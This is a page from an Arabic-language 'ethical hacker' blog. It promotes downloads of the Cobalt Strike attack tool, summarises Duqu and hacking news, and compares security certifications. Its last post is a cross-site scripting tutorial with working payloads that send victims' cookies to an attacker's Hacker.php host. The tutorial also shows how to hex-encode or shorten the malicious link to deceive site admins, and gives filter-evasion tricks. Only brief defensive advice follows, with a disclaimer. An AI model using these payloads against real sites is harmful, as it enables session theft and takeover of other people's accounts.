بحث هذه المدونة الإلكترونية

‏إظهار الرسائل ذات التسميات اختبار الاختراق. إظهار كافة الرسائل
‏إظهار الرسائل ذات التسميات اختبار الاختراق. إظهار كافة الرسائل

تم أطلاق سراح أداة اختبار ألاختراق الرهيبة (Cobalt Strike) علي مدونة الهكر الاخلاقي العربي


السلام عليكم ورحمة الله وبركاته

موضوعنا اليوم الثاني فهو يتحدث عن الاداة الرهيبة cobalt strike

فما اجمل هذة الاداة؟

بما فيها من معلومات خطيرة عن اختبار الاختراق والحماية منة

ولكن اليوم وعلي مدونة الهكر الاخلاقي العربي سوف تتم رفع هذة الاداة لكي يتمكن الجميع من رؤيتها.

تم رفع النسخة التجربية من الاداة لكي تتوافق مع 

نظامين هما( الويندوز والينوكس )

الاداة من رفعي الخاص وعلي الميديا فاير

ولكن لم تتوفر هذة النسخ الي كل بلاد العالم"
















وربما تكون واجهت صعوبات في تحميلها من موقعها الرسمي"

http://www.advancedpentest.com/"

ولكن هذة الاداة ( Cobalt Strike ) سيكون اول رفعها علي المدونات العربية
 

لتحميل الاداة المتوافقة مع نظام الويندوز

http://q.gs/2197994/cobalt-strike



ولمعرفة كيفية تثيتها علي النظام يرجي اتباع الرابط التالي

http://www.advancedpentest.com/help-install-windows
 
 



لتحميل الاداة المتوافقة مع نظام اللينوكس

معلومة الاداة تتوافق مع كل توزيعات الباك تراك وباقي التوزيعات الاخري الخاصة بأختبار الاختراق

وانصحك بتثبيتها علي نظام اللينوكس لما تتميز من سرعة في الاداة وتجنب الاخطاء

للتحميل

http://q.gs/2197994/cobalt-1-strike

ولمعرفة كيفية تثبيتها يرجي اتباع الرابط التالي

http://www.advancedpentest.com/help-install-linux
 
 


معلومات مهمة علي اداة اختبار الاختراق Cobalt Strike


تتطلب أداة الكوبالت استرايك البرامج التالية:

1: Rapid7's ****************sploit® Framework 4.4.0

2:Oracle's Java 1.7 (32-bit)
متتطلباة التشغيل



  • 2 GHz+ processor
  • 2 GB RAM
  • 500MB+ available disk space

وايضا تدعم الظامين التالين


  • BackTrack Linux 5r3 - x86 and x86_64
  • Ubuntu Linux 10.04 - x86 and x86_64

وايضا تدعم الانظمة الأتية 





  • Windows XP, Windows 2003, Windows 2008 Server, Windows Vista, and Windows 7
  • MacOS X 10.6 or above


الي هنا تأتي نهاية الموضوع"
وان شاء الله سوف يكون موضوعي القادم "
عن كيفية استهداف الاجهزة وكيفية اختبار الاختراق بهذة الاداة الرهيبة"
وسوف اضع شروحات صوت وصورة عن كيفية الاختراق بها "
والي ما يمكن ان تفعلة هذة الاداة الرهيبة"


اتمني ان تكونوا استمتعتم بالموضوع"
واي سؤال او استفسار انا موجود ان شاء الله"
وكم اتمني ان تقدرو مجهودي وتعبي علي المعلومات الأتية
لكي تكون اول مدونة عربية تتحدث عن هذة الأداة الرهيبة 



www.afinis.co.cc : المصدر

خوادم لينكس استخدمت كمراكز تحكم بدودة Duqu



قامت مختبرات كاسبرسكي بنشر تفاصيل جديدة مثيرة حول دودة Duqu والتي هاجمت أهداف متعددة بغرض سرقة بيانات وتحديداً في إيران. التفاصيل تشير إلى ان الخودام التي استخدمت كمراكز سيطرة وتحكم بالدودة هي خوادم لينكس وفي غالبها كانت من توزيعة CentOS. وفي ما يلي قائمة تخلص التفاصيل الجديدة:
- الخودام يعود تاريخ عملها الى شهر نوفمبر (تشرين الثاني) 2009 على أقل تقدير.
- خودام عديدة تم اختراقها في امكان متعددة في فيتنام، الهند، المانيا، سنغافورة، سويسرا، المملكة المتحدة (بريطانيا)، هولندا، بلجيكا، كوريا الجنوبية وغيرها. غالب الخوادم التي تم اختراقها هي خوادم لينكس تستخدم توزيعة CentOS سواء التي تدعم معيارية 32bit او 64bit.
صورة توضحية تظهر خوادم مخترقة وخوادم تم تحليلها من قبل مختبرات كاسبرسكي وضحايا الهجوم - نقلاً عن Kaspersky Labs
- الخوادم يبدو أن اختراقها تمّ عبر محاولة كسر كلمة مرور المستخدم الجذر (التعليق على ذلك سيأتي في سياق المقال).
- المخترقون قاموا فور اختراق الخوادم بترقية حزمة OpenSSH 4.3 إلى الإصدارة الأخيرة OpeenSSH 5.8.
- عملية تطهير شامل لآثار الاختراق والسجلات التي تدل عليه تمّت في 20 اكتوبر (تشرين أول) في كل الخودام التي استخدمت في الهجوم الأخير بالإضافة الى التي “لم يتم” استخدامها.
- مركز السيطرة والتحكم الرئيسي لازل مجهولاً.
اللغز في هذا التحليل يكمن في الآلية التي استخدمت لاختراق خوادم لينكس، والذي جعلت عملية التطهير للخوادم حلّه أمراً صعباً للغاية.
وفقاً لمختبرات كاسبرسكي، فقد تمكنوا مهندسوها من استرجاع بعض الملفات التي تم حذفها خلال عملية التطهير والتي تظهر محاولات لكسر كلمة مرور الجذر
سجل يظهر محاولات كسر كلمة مرور المستخدم الجذر - Kaspersky Labs
وفقاً للسجّلات اعلاه استغرقت العملية 8 دقائق و 42 ثانية. هذا دليل على أن كلمة المرور في حال كانت هذه هي الطريقة التي استخدمت لاختراق الخوادم، كلمة ضعيفة بالإضافة إلى ان مدير الخادم لم يفعّل أي آلية حماية ضد هذا النوع من الهجمات.
ولكن ما يثير التساؤل هو لماذا قام المهاجمون بتحديث حزمة OpenSSH من 4.3 إلى 5.8؟
سجلات تظهر قيام المهاجمين بتحديث حزمة OpenSSH - نقلاً عن Kaspersky Labs
هناك سببان لذلك كما ذكر أحد المعلّقين:
1- الإصدارة المثبّتة (OpenSSH 4.3) تحتوي على ثغرة تمّ اصلاحها في الإصدارة الأخيرة، والمهاجمون أراد ترقيعها حتى لا يتمّ اختراق الخوادم من قبل مجموعة أخرى من المهاجمين (بدوافع مختلفة).
2- لإن الإصدارة المثبتة لا تحتوي على خصائص واضافات جديدة يحتاجها المهاجمون وتدعمها الاصدارة الجديدة.
قد تكشف الأيام المقبلة المزيد من التفاصيل المثيرة حول هذه الدودة وبعضاً من ألغازها.


www.afinis.co.cc : المصدر

مقارنة بين شهادات أمن المعلومات


إذا كنت مهتم في مجال أمن المعلومات فلا بدّ أنّه قد مرّ عليك العديد من الشهادات في هذا المجال، وهو ما يوقع المرء في حيرة من أمره. فأي هذه الشهادات يختار وعلى أي أساس يجري مقارنة بين هذه الشهادات وأي يكمن أفضل إنفاق لماله وعلى أي شهادة من هذه الشهادات. هذا ما سأحاول إن شاء الله تغطيته.
قبل البدء في المقارنة أود الإشارة إلى أنّه لا يوجد شهادة قط تعادل الخبرة، ولكن الكثير من أماكن العمل تطلب هذه الشهادة أو تلك. أنت من سيحدد مسارك سواء إذا ترغب في الالتحاق بوظيفة او القيام بمشروعك الذاتي أو خلاف ذلك. في هذه المقالة سنحاول مقارنة بعض أشهر شهادات المعلومات وما الذي يحتاجه المرء للحصول عليها. تذكر، لاشيء يعادل الخبرة.

Security+

هذه الشهادة تعد شهادة محايدة بمعنى أنها غير تابعة لمنتج أو شركة معنية. شركة CompTIA هي الشركة الراعية لهذه الشهادة. الإمتحان يغطي خمس مجالات وهي:
  • أمن الشبكات
  • أمن العمليات والامتثال (Compliance)
  • الثغرات والتهديدات
  • أمن التطبيقات والبيانات والأجهزة
  • التحكم بالدخول وإدارة الشخصيات
  • التشفير
الشهادة مرّت بتغير كبير عام 2008. هناك معاهد تقوم بإجراء تدريب على هذه الشهادة حيث يتمّ فيه عمل تغطية عملية للمواضيع المطروحة. لا يوجد متطلبات لهذه الشهادة ولكن CompTIA تنصح المتقدم لهذه الشهادة بان يكون حاصل على شهادة Network+ ولديه سنتان خبرة عملية.
مدة الامتحان: 90 دقيقة
عدد الأسئلة: 100 سؤال
العلامة المطلوبة للنجاح: 750 من 900
رسوم الشهادة: ~270 دولار

CISSP Certified Information Systems Security Professional

واحدة من أكثر الشهادات شهرة في مجال أمن المعلومات. هذه الشهادة تغطي 10 مجالات في أمن المعلومات وتعتبر إدارية أكثر منها عملية ولكن الشخص المتقدم للامتحان يحتاج إلى خمس سنوات خبرة. سامر قام بتغطية رائعة لهذه الشهادة في مقال يمكن الاطلاع عليه هنا.
المجالات التي يتم تغطيتها في الشهادة هي:
1- التحكم بالوصول.
2- أمن التطبيقات.
3- استمرارية العمل و التخطيط للاسترجاع بعد الخراب.
4- التشفير.
5- امن المعلومات وإدارة المخاطر.
6- القوانين والتحقيقات.
7- أمن العمليات.
8- أمن البيئي.
9- أمن التخطيط والتصميم.
10- الإتصالات وأمن الشبكات.
متطلبات الشهادة:
1- خمس سنوات خبرة أو أربع سنوات خبرة وسنة جامعية أو شهادات أخرى من منظمات أخرى.
2- قبول الكود الأخلاقي ل CISSP.
3- الإجابة على أسئلة حول الخلفية وتحديداً الجنائية للمتقدم.
4- مصادقة شخص حامل للشهادة على خبرات الشخص المتقدم.
الشهادة صالحة لثلاث سنوات فقط وبعدها على حامل الشهادة تقديم الإمتحان مرّة اخرى. أو الحصول على تدريب او المشاركة في تدريب او إعداد أبحاث في مجالات الشهادة يحصل من خلالها حامل الشهادة على نقاط تعرف ب CPE أو Continuing Professional Education إذا حصل الشخص على 120 نقطة مع نهاية الثلاث سنوات فبإمكانه تجديد الشهادة من إعادة الإمتحان.
امتحان CISSP يحتاج الى دراسة مكثفة ولهذا عليك التخطيط جيداً والعمل طويلاً إذا اردت التقدم لهذه الشهادة.
عدد أسئلة الإمتحان: 250 سؤال
مدة الامتحان: 6 ساعات.
رسوم الامتحان: 599 دولار
للنّجاح على الممتحن الحصول على 700 نقطة على الأقل. الإمتحان يعطى على الورق وليس على الحاسوب والنتيجة تظهر بعد أسبوعين على الأقل من يوم تقديم الإمتحان.

C|EH Certified Ethical Hacker

اكتسبت هذه الشهادة الكثيرة من الشهرة كونها من أوائل الشهادات التي طرحت في هذا المجال. ولكن هناك الآن العديد من الشهادات التي تنافس وبقوة هذه الشهادة. آخر نسخة من هذه الشهادة هي الإصدارة السابعة و تحتوي على تعديلات هائلة إذا ما قورنت بالإصدارات السابقة. هناك الكثير من الانتقادات لهذه الشهادة واتهامات باحتوائها على مواد مسروقة.
ميزة هذه الشهادة انه تثبت أن لديك معرفة بأساليب الهاكرز وأدواتهم المستخدمة. ولكن عيب كبير فيها ان التركيز في غالبه يتم على الادوات والعديد من الادوات المستخدمة قديمة.
عدد أسئلة الإمتحان: 150
مدّة الامتحان: 4 ساعات
علامة النجاح: الحصول على 70% على الاقل
رسوم الامتحان: 500 دولار (الاصدارات السابقة كانت 100 دولار) + 100 دولار للطلب

OSCP Offensive Security Certified Professional

هذه الدورة عملية بمعنى الكلمة. من التدريب وحتى الامتحان. المبادئ يتم شرحها بشكل بسيط مع إعطائك مصادر (في الغالب من الويكي) للقراءة أكثر حول الموضوع. ما ستتعلمه في التحضير لهذه الشهادة يفوق بمراحل ما يمكن تعلمه في شهادة ك C|EH. يمكن الاطلاع على مقالة صبري الرائعة حول الشهادة هنا.
مدّة الامتحان: 24 ساعة
رسوم الامتحان: 750 دولار تشمل التدريب و30 يوم للدخول على المختبر بالاضافة الى الشهادة

SANS GPEN  GIAC Certified Penetration Tester

هذه الشهادة يسبقها 6 أيام من التدريب والذي يقدمه معهد سانز الأيام الخمس الأولى موزعة كالآتي:
اليوم الاول: يغطي التخطيط و مجال الإختبار والجوانب القانونية والإدارية وختماً عملية تفحص الهدف.
اليوم الثاني: يغطي عملية المسح.
اليوم الثالث: يغطي عملية استغلال الثغرات.
اليوم الرابع: هجمات كلمات المرور.
اليوم الخامس: الشّبكات اللاسلكية وتطبيقات الويب.
وأخيراً اليوم السادس وهو اليوم الذي على الطالب القيام فيه بتطبيق كل ما تعلّمه في الأيام الخمس الأولى في مسابقة أمسك العلم. جانب مهم جداً في هذه الشهادة هو التركيز على الأدوات التي فعلاً يحتاج إليها المختبِر وليس مثل C|EH في عرض عشرات الأدوات لكل مهمة من المهمات. وهي ليست مثل شهادة OSCP حيث انها تغطي الجوانب النظرية والعملية معاً. الشهادة تعدّ المتقدم الى سوق العمل بشكل ممتاز خصوصاً إذا كانت اختبارات الاختراق هي اهتمامك.
عدد أسئلة الإمتحان: 150 سؤال
مدّة الامتحان: 4 ساعات
العلامة المطلوبة: 70%.
رسوم الامتحان: 499 دولار إذا حصل الطالب على التدريب 899 دولاراً بدون تدريب
نصيحة أخيرة، أنت من يعرف احتياجات سوق العمل لديه، وكذلك مجالات اهتمامه، ولذلك أنت من يقرر أي هذه الشهادات أو غيرها هو الأفضل لك. هذه فقط محاولة لتسليط الضوء على بعض أشهر الشهادات الموجودة في السوق.




www.afinis.co.cc : المصدر

هاكر يبلغ من العمر 17 سنة يخترق موقع متخصص في تدريب الامن المعلوماتي وتقديم شهادة الهاكرالأخلاقي


ان يخترق موقع متخصص في تقديم دروس الامن المعلوماتي والحصول على شهادة هاكر اخلاقي امر عادي جدا ، لكن ان يخترق من طرف مراهق يبلغ من العمر 17 سنة هذا هو الغير عادي في القصة  خصوصا وان الثغرة المكتشفة
من طرف الهاكر وطريقة إستغلالها بسيطة على حد تعبير الهاكر المجهول . اضف الى ان الموقع المخترق
.يسهر على تأمينه العديد من الكفاءات ankitfadia.in
إن ضرب المواقع التي تقدم تدريب في الامن المعلوماتي هو ضرب مباشر لسمعة الموقع كذلك ، خصوصا وان الراغب في تلقي دروس في الامن المعلوماتي لازال غير قادر د على الإستيعاب الجيد لفكرة "لاوجود لحماية قصوى في
." العالم الإفتراضي

غير ذلك فإن المراهق لم يقم فقط بإختراق الموقع بل كذلك نشر رسالة يخاطب فيها مؤسس الموقع حيث يقول : " هذا الكذاب يدعي ان له دراية جيدة بميدان الهاكينغ والحماية ، وقام بتأسيس هذا الموقع من اجل ان يقدم تداريب
 .  "سؤالي هو : من أين لك شهادتك ؟؟ AFCEH في مجال الامن المعلوماتي لنيل شهادة
الهاكر رغم صغر سنة إلا ان له إنجازات كبيرة في ميدان الإختراق وهي مسجلة في مواقع تسجيل الإختراق اضافة
. الى كونها متنوعة بين مواقع حكومية واخرى خاصة بوسائل الإعلام كذلك مئات المواقع الاخرى
ankitfadia.in بالفعل إستطاع هذا الشاب ان يلقن "خبراء الحماية"  الساهرين على تأمين موقع
 درسا جديدا يضاف الى سجل الدروس التي لقنت لطاقم الموقع بالمجان خصوصا وان الدرس الاول كان في شهر يناير من السنة الحالية حيث  إخترق الموقع وسحبت منه بيانات عشرات المتدربين من اجل نيل شهاة هاكر
.اخلاقي


www.afinis.co.cc : المصدر




اغبى هاكر لسنة 2012 بإمتياز


إختراق انظمة المعلوميات للمنشآت النووية امر ليس بالسهل ويتطلب قاعدة اساسية وهي اشخاص متمرسين ذوي خبرة  وغير عادين ، القاعدة التي لم يتمكن من اذراكها بشكل جيد  احد الهاكرز الذي حاول إختراق شركة
. Areva متعددة الجنسيات تهتم بالطاقة النووية وكذلك مشاريع اخرى لها علاقة بالطاقة
 حيث قام الهاكر بمراسلة الشركة بالتروجان عبر ايميل  هذا الاخير بعد تحليله من طرف باحثين امنين وفك الضغط عن الملف التنفيدي تفاجأ الباحثون ان الملف التنفيدي الذي يحتوي على 30 ميغا (الامر الغير طبيعي) يحتوي
Dark Comet Remote على صور عائلية وكذلك على ملفات ايتونز اضف الى ذلك تروجان يتحكم فيه عبر اداة
. التي يستخدمها الهاكرز على نطاق واسع في إختراق الشركات  Administration Tool
غير ذلك الغريب في الامر ان التروجان المكتشف لايعمل رغم تنفيده لان التروجان بكل بساطة لم يتم اعداده بشكل
. جيد

(صورة للهكار مع احد اقربائه)
وهو عضو في فريق الكشف عن البرامج الضارة ان التروجان عند تتبيثه  Snorre Fagerland حيث يقول
فإنه لايعمل كون انه لم يتم اعداده بشكل صحيح ،كذلك ان حجم التروجان غير طبيعي 30 ميغا ويحتوي على صور عائلية وكذلك ملفات ايتونز. كما اضاف الخبير الامني قائلا انه يضع هذا الهجوم امام فرضيتين اثنين اولهما انه من الممكن ان يكون هذا الهجوم هو حقيقي وان الخطأ الذي ارتكبه الهاكر انه جرب التروجان محليا فقط ، لهذا فإن خطأ في الإعدادات جعل التروجان لايعمل عن بعد . اما الفرضية الثانية والتي تجعلني  لا اعرف هل اضحك ام ابكي هو ان الهاكر عندما قام بتكوين التروجان الخاص به ،اضاف صوره العائلية وكذلك ملفات الايتونز الخاصة به دون ان ينتبه
. الى ذلك او لحجم التروجان
.الامر الذي اذا ما تحقق سيجعل هذا الهاكر وبدون اي منافس اغبى هاكر لهذه السنة بإمتياز



www.afinis.co.cc : المصدر

ثغرات Cross Site Scripting - xss








السلام عليكم في هده التدوينة سوف أشرح لكم عن نوع من أنواع ثغرات Web Application و هي Cross Site Scripting
 وإختصارها هو xss وعن نوعيها reflected و stored أولا نأتي لشرح هده الثغرات وهي كالتالي :
تعتمد ثغراث xss على مدخلات يتم إدخالها من طرف المخترق وهي تكون بلغة javascript أو html و يتم إدخالها  غالبا في صندوق التعاليق أو في مربع البحث وبطرق أخرى سوف ندرسها في مايلي من التدوينة أما عن سببها فهو أن المبرمجين لا يقومون بوضع أكواد تمنع من إدخال هده الإستغلالات من طرف المخترقين بالنسبة لما يخص إنتشار هده الثغرة فهو كبير جدا ويسهل الإختراق بها وعن بعض نتائج الإختراق بها فهي كالأتي:
-سرقة الكوكيز والدي يسمح لك بالدخول إلى لوحة التحكم  للموقع بدون معرفة كلمة السر
-تحويل زوار الموقع المخترق إلى موقع أخر من إختيارك وهدا مايستغله البعض في تحويل الزوار إلى مواقع ويطلبون تحميل ملفات أو برامج يوهمون الضحية بأنها
من صاحب الموقع المخترق وبالتالي تكون هده البرامج عبارة عن فيروسات تؤدي إلى إختراق أجهزتهم
-تغيير محتوى الصفحة بإدحال أكواد html كالتي نراها يوميا و بالمئات وهده تكون غالبا من طرف الأطفال الدين يسمون أنفسهم بالمحترفين
ويمكن للمخترق الدكي أن يستعمل الكثير من الطرق ليستغل هده الثغرة شر إستغلال
 نأتي الأن إلى طريقة الإختراق عن طريقها يمكن أن ندهب إلى أي تطبيق ويب  كمحركات بحث المواقع



ونجرب عليه هدا الكود   <script>
نقوم بإلقاء نضرة على الكود المصدري لصفحة


كما ترون فإن الكود تم إلحاقه كما كتبناه  أما إدا كان الموقع محميا لكتب الكود بهدا الشكل  &lt;script&gt;  
بعد أن تأكدنا أن التطبيق مصاب بالثغرة نقوم بالتأكيد أكثر عبر إدخال كود جافاسكربت  هدا <script>alert('BTS')</script>

 فيكون الناتج كالأتي  :

نعم فكما ترون  ضهر الرقم الدي وضعناه بين قوسين وهدا دليل على أن التطبيق مصاب بالثغرة

أنواع ثغرات xss :

فكما دكرنا في أول التدوينة فإن ثغرات  xss نوعين وهما 
stored وهو الأكثر خطورة بحيث يتم الإحتفاض بالكود في قاعدة البيانات فخد معي كمثال صندوق التعليقات الموجود تحت هدا الموضوع فلو كان الموقع مصابا فيمكن للمخترق أن يكتب كودا بالجافاسكربت يستطيع به أن يسرق كوكيز كل من يدخل هده الصفحة
وأشياء أخرى
reflected وهو النوع الأكثر إنتشارا بين المواقع هده الأيام يرسل الكود الضار إلى السرفر عن طريق HTTPrequest السرفر يقوم بإلحاقه بملف html و يرجع الملف وهدا ما يسمى بHTTPResponse إلى المتصفح وعندما المتصفح يفتح ملف HTML يضهر الكود المحقون للمتصفح و هدا النوع يطبق على صناديق البحث بالمواقع وتكون له أضرار كالنوع الأول 

كيف يتم سرقة الكوكيز

تستطيع سرقة الكوكيز بكل أنواع  Cross Site Scripting فكل ما تحتاجه هو ملفين الأول يكون مكتوب بلغة php مكتوب به كود يقوم بسرقة الكوكيز وأخر بصيغة txt يقوم بإستقبال الكوكيز  وتحفض به و تحتاج كدلك لإستضافة لرفع الملفين عليها وهي بكثرة و مجانية ويكون ملف php بعد الرفع بهدا الشكل  hxxp://www.YourSite.com/Hacker.php 
نقوم الأن بحقن الكود في المواقع المصابة بالstored بهدا الشكل 

<script>location.href = 'http://www.Yoursite.com/Hacker.php?cookie='+document.cookie;</script>
وبمجرد دخول admin إلى هده الصفحة فسيتم إرسال الكوكيز الخاص به عن طريق ملفHacker.php إلى الملف النصي txt  وبتغيير بسيط في اعدادات المتصفح ستتصفح الموقع المصاب وسوف تدخل الى لوحة التحكم من دون الحاجة الى معرفة كلمة السر او اليوز
لن اشرح كيفية تغيير اعدادات المتصفح ويمكنكم ان تبحثو عنها في google
اما بالنسبة للمواقع المصابة بالنوع الآخر reflected فسيكون الإستغلال مختلفا بعض الشئ بحيث نحقن الكود السابق في صناديق البحث بحيث تضهر في مكان وضع أسماء المواقع كالآتي  

hxxp://www.VulnerableSite.com/index.php?search=<script>location.href ='http://www.Yoursite.com/Hacker.php?cookie='+document.cookie;</script>
وبعدها تقوم بحفض الكود وإرساله إلى الأدمن وبمجرد فتحه ستكون قد سرقت الكوكيز الخاص بموقعه 
ولقليل من التمويه يمكن أن تقوم بتشفير الرابط فيصبح كالتالي
hxxp://www.VulnerableSite.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e


أو أن تجعلو الرابط مختصر فيصبح hxxp://www.tinyexample.com/rdsse23

تغيير محتوى الصفحة  

وهدا يكون فعالا في stored ولايكون فعالا في reflected بطريقة صحيحة ويمكن تطبيق الأمر الآتي 


<'';'body onload= "document.body.innerHTML='YOUr html code her>

تخطي الحماية ضد ثغرات xss

في بعض الأحيان تكون المواقع مصابة لكنها تستعمل فلاتر مثل WAF فتضهر وكأنها غير مصابة ودلك بحيث إدا قمنى بإختبار هدا الكود  <scirpt>alert("hi")</script>  والموقع يحتوي على WAF فسيكون الناتج هو هدا 
<script>alert(>xss detected<)</script>


كما ترون لقد غيرت محتوى الكود ومنعت من عمله ويمكن تخطي هده الحماية في حالتين :

تجاوز magic_quotes_gpc 

هده التعليمة تكون بملف php.ini و إدا كانت تعمل فتقوم بمنع تنفيد أي أمر به مثل هده الرموز " \ '  و يصبح مستحيل تنفيدها 
لكن هناك الحل لتجاوزها وهو تشفير الكود بASCII كأن نشفر
alert("hi");
String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)
كما ترون الكود لايحتوي على أي رموز هكدا سنتمكن من الإلتفاف على الحماية و يمكن كدلك إستعمال تشفير أخر كالتشفير بHEX

تجاوز الحماية بإستعمال أسلوب التشويش

بعض المواقع لاتسمح بإستعمال alert و script في مواقعها و تقوم بحضرها ويمكن الإلتفاف عليها بطرق سهلة بكتابة الكود هكدا 
<ScRipt>ALeRt("hi");</sCRipT>


أو هكدا

"><script>alert("Hi");</script>

كما يمكنكم زيارة هدا الموقع لمعرفة المزيد من الطرق http://ha.ckers.org/xss.html

كيفية الحماية من هده الثغرات 

  • كمستخدم عادي تستطيع حماية نفسك من خلال إستخدام هده الإضافة الخاصة بمتصفح موزيلا  No-Script Addon  وأيضا من خلال عدم الوثوق في الروابط القصيرة و للحماية فيمكنك مسح كل الكوكيز من على متصفحك ومن ثم تصفحها من خلال بروكسي لكي لا يلتقط المخترق الأيبي الخاص بك 
  • و كصاحب موقع فما عليك سوى إستخدام جدران نارية و سكربتات تحد من فاعلية الثغرة 
وفي الأخير أود التنويه أن كل ما دكرته ليس إلا للأغراض التعليمية وأنا لست مسؤولا عن أي شخص يستعملها لأغراض التخريب
يمكن طرح تساؤلاتكم من خلال صندوق التعليقات أسفله
شكرا للمتابعة وإلى التدوينة القادمة :)





www.afinis.co.cc : المصدر
 
Copyleft © 2011. مدونة الهكر الاخلاقي العربي - All lefts Reserved
تعريب the3kira